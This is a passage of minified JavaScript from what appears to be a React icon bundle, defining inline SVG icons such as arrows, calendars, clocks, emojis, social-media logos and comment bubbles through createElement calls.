12"})),arrow_up_top_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 18V6m0 0H6m12 0L6 18"})),arrow_up_top_upward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 11 12 7.5m0 0 3.5 3.5M12 7.5v9"})),arrow_up_top_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 12 12 3.5m0 0 8.5 8.5M12 3.5v17"})),at_a_mail_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 8v7a2 2 0 0 0 2 2 4 4 0 0 0 4-4v-1c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10c1.821 0 3.53-.487 5-1.338M16 12a4 4 0 1 1-8 0 4 4 0 0 1 8 0Z"})),author_user_human_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4.5 20.533A6.533 6.533 0 0 1 11.033 14h1.934a6.533 6.533 0 0 1 6.533 6.533.467.467 0 0 1-.467.467H4.967a.467.467 0 0 1-.467-.467Z"})),author_user_human_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 8a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 20.5a8 8 0 1 0-16 0"})),author_user_human_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 21v-3a4 4 0 0 1 4-4h8a4 4 0 0 1 4 4v3"})),author_user_human_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13.5c-3.283 0-6.156 1.585-7.728 3.776C2.984 19.07 4.791 21 7 21h10c2.209 0 4.015-1.93 2.727-3.724C18.155 15.086 15.283 13.5 12 13.5Z"})),book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.5 18.5v-3.092a3 3 0 0 1 .504-1.664l1.219-1.828a.934.934 0 0 1 1.554 0l1.22 1.828a3 3 0 0 1 .503 1.664V18.5m-5-2.5h5"})),book_reading_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 19h9M4 19V7a3 3 0 0 1 3-3h3M4 19a3 3 0 0 0 3 3h11M4 19a3 3 0 0 1 3-3h11v-4"}),(0,a.createElement)("circle",{cx:"14.5",cy:"7.5",r:"5.5",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 5v3l2 1"})),calendar_date_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18M8 13.5h.01M8 17h.01M12 13.5h.01M12 17h.01M16 13.5h.01M16 17h.01"})),calendar_date_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15v16a2 2 0 0 1-2 2H8a2 2 0 0 1-2-2v-1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15l-3.595 13.032a2 2 0 0 1-1.928 1.468H3.313a1 1 0 0 1-.964-1.266L6 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 13.5 12.5 8l-2 1m-1 4.5h3m4-12-.5 3m-2.5-3-.5 3m-2.5-3-.5 3"})),calendar_date_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18"})),calendar_date_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM7.5 2v3M12 2v3m4.5-3v3M8 13.5h.01M8 10h.01M8 17h.01M12 13.5h.01M12 10h.01M12 17h.01M16 13.5h.01M16 10h.01M16 17h.01"})),caret_up_top_triangle_angle_arrow_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.8 6.067a1 1 0 0 0-1.6 0l-7 9.333A1 1 0 0 0 5 17h14a1 1 0 0 0 .8-1.6l-7-9.333Z"})),category_book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 11h-5v3h5M7.5 15.5h3m-3 3h3"})),category_file_documents_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 7H5a2 2 0 1 1 0-4h16v6.5L19.5 11v7h-3"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5v16h13.5V7m-10 7.5h3m-3 3h3"})),category_file_documents_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 20h16a1 1 0 0 0 1-1V8a1 1 0 0 0-1-1H6a1 1 0 0 0-1 1v12Zm0 0H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h11.172a2 2 0 0 1 1.414.586L19 7"})),category_file_documents_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 20H6a1 1 0 0 1-1-1v-8a1 1 0 0 1 1-1h7.586a1 1 0 0 0 .707-.293l2.414-2.414A1 1 0 0 1 17.414 7H21a1 1 0 0 1 1 1v11a1 1 0 0 1-1 1Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M20 7V5a1 1 0 0 0-1-1h-3.586a1 1 0 0 0-.707.293l-2.414 2.414a1 1 0 0 1-.707.293H3a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h2"})),category_file_documents_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20V5a1 1 0 0 1 1-1h5.586a1 1 0 0 1 .707.293L11.5 6.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 6.5h10a2 2 0 0 1 2 2V11M6 11l-4 9h16l4-9H6Z"})),clock_reading_time_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 6v6l4 2"})),clock_reading_time_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M12 2v1.5M2 12h1.5M12 22v-1.5M22 12h-1.5M13 13 9.5 9.5M11 13l5-5"})),clock_reading_time_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 13.5V16a6 6 0 0 1-6 6H2v-7a6 6 0 0 1 6-6h1"}),(0,a.createElement)("circle",{cx:"15.5",cy:"8.5",r:"6.5",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.111V9l2 1.111M6 15h3m-3 3h7"})),confused_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 10v1.5m7-1.5v1.5M9 17c.778-.839 3.267-2.516 7-1.845"})),correct_save_check_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 12.5 2.5 2.5L16 9"})),correct_save_check_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.5 13 5 5 10-12"})),cross_close_x_minimize_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 8 8 8m0-8-8 8"})),cross_x_close_minimize_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m6 6 6 6m0 0 6 6m-6-6 6-6m-6 6-6 6"})),desktop_monitor_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 3H4a2 2 0 0 0-2 2v10a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2ZM8 21h8m-4-4v4m0-7.5h.01"})),dot_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2Z",clipRule:"evenodd"})),download_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 15v4c0 1.1.9 2 2 2h14a2 2 0 0 0 2-2v-4m-4-6-5 5-5-5m5 3.8V2.5"})),download_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 13v8m0 0-2.5-2.5M12 21l2.5-2.5"})),facebook_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M16.5 8H14a2 2 0 0 0-2 2v11m-2-7h5"})),google_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m21.882 10.459-.103-.428h-9.485v3.938h5.667c-.588 2.741-3.318 4.184-5.549 4.184-1.623 0-3.333-.67-4.465-1.746a6.25 6.25 0 0 1-1.4-2.021 6.152 6.152 0 0 1-.502-2.393c0-1.66.76-3.318 1.865-4.41 1.106-1.091 2.776-1.702 4.437-1.702 1.902 0 3.264.99 3.774 1.442l2.853-2.784C18.137 3.818 15.838 2 12.254 2 9.49 2 6.84 3.039 4.903 4.933 2.99 6.8 2 9.497 2 12s.937 5.066 2.79 6.946C6.77 20.952 9.574 22 12.46 22c2.627 0 5.117-1.01 6.892-2.842 1.745-1.803 2.647-4.3 2.647-6.915 0-1.101-.113-1.755-.118-1.784Z"})),growth_increase_up_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m20.2 7.8-7.7 7.7-4-4-5.7 5.7"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 7h6v6"})),hamicon_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 6a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 20a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),hamicon_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0-7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),happy_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8v1.5m7-1.5v1.5M12 18a5 5 0 0 0 5-5H7a5 5 0 0 0 5 5Z"})),heart_love_wishlist_favourite_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.098 13.848 7.52 7.519a.542.542 0 0 0 .765 0l7.52-7.52a5.678 5.678 0 0 0 0-8.028 5.047 5.047 0 0 0-7.138 0l-.711.71a.076.076 0 0 1-.107 0l-.711-.71a5.047 5.047 0 0 0-7.138 0 5.678 5.678 0 0 0 0 8.029Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.334 7.48c.553 0 1.107.21 1.53.633.547.548.78 1.292.695 2.006"})),hemicon_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h16"})),hemicon_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h16M4 19h16"})),hemicon_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h8"})),hidden_hide_invisible_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.862 5.999c-1.61-1.148-3.576-2-5.86-2-7 0-11 8-11 8s1.764 3.529 5 5.899m3 1.596a9.213 9.213 0 0 0 3 .505c7 0 11-8 11-8s-.867-1.734-2.5-3.587"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14 9.764A3 3 0 0 0 9.764 14m5.21-1.601a3.002 3.002 0 0 1-2.59 2.577M3.6 20.4 20.4 3.6"})),home_house_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.671 9.403 7-6.222a2 2 0 0 1 2.658 0l7 6.222A2 2 0 0 1 21 10.898V19a2 2 0 0 1-2 2h-3.5a1 1 0 0 1-1-1v-5a1 1 0 0 0-1-1h-3a1 1 0 0 0-1 1v5a1 1 0 0 1-1 1H5a2 2 0 0 1-2-2v-8.102a2 2 0 0 1 .671-1.495Z"})),hourglass_timer_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 2v4.93a2 2 0 0 0 .89 1.664l4.555 3.036a1 1 0 0 0 1.11 0l4.554-3.036A2 2 0 0 0 18 6.93V2M6 22v-4.93a2 2 0 0 1 .89-1.664l4.555-3.036a1 1 0 0 1 1.11 0l4.554 3.036A2 2 0 0 1 18 17.07V22"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 2h16M4 22h16M9.5 19.5h5M11 17h2"})),instagram_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"4",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M17 7h.01"})),laptop_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 6a2 2 0 0 1 2-2h13a2 2 0 0 1 2 2v10h-17V6Zm7 1h3M2 16h20v2a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2v-2Z"})),left_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M3 21h8m-8-6h18M3 9h8"})),left_triangle_angle_arrow_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.067 12.8a1 1 0 0 1 0-1.6l9.333-7A1 1 0 0 1 17 5v14a1 1 0 0 1-1.6.8l-9.333-7Z"})),linkedin_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M7.75 10.25v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"2",d:"M7.75 7.75h.01"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M11.25 10.25v6m5 0v-3.5a2.5 2.5 0 0 0-5 0"})),link_chains_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m14.011 17.028-2.514 2.514a4.977 4.977 0 1 1-7.04-7.04L6.973 9.99M9.99 6.973l2.514-2.514a4.978 4.978 0 1 1 7.04 7.04l-2.515 2.513M9.5 14.5l5-5"})),location_gps_map_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"10",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 10.205C20 17.385 12 22 12 22s-8-4.615-8-11.795C4 5.674 7.582 2 12 2s8 3.674 8 8.205Z"})),long_arrow_up_top_increase_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21V3m0 0L6 9m6-6 6 6"})),mail_email_messege_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 8 4.8 3.6a2 2 0 0 0 2.4 0L18 8"})),media_document_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 21h14a2 2 0 0 0 2-2V8.828a2 2 0 0 0-.586-1.414l-3.828-3.828A2 2 0 0 0 15.172 3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2ZM8 9h4m-4 3h8m-8 3h6"})),messege_comment_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 7v15l5-4h13a2 2 0 0 0 2-2V7a2 2 0 0 0-2-2H4a2 2 0 0 0-2 2Zm7 3h4m-4 3h6"})),messege_comment_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM9 9h4m-4 3h6"})),messege_comment_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM8 11v-1m4 1v-1m4 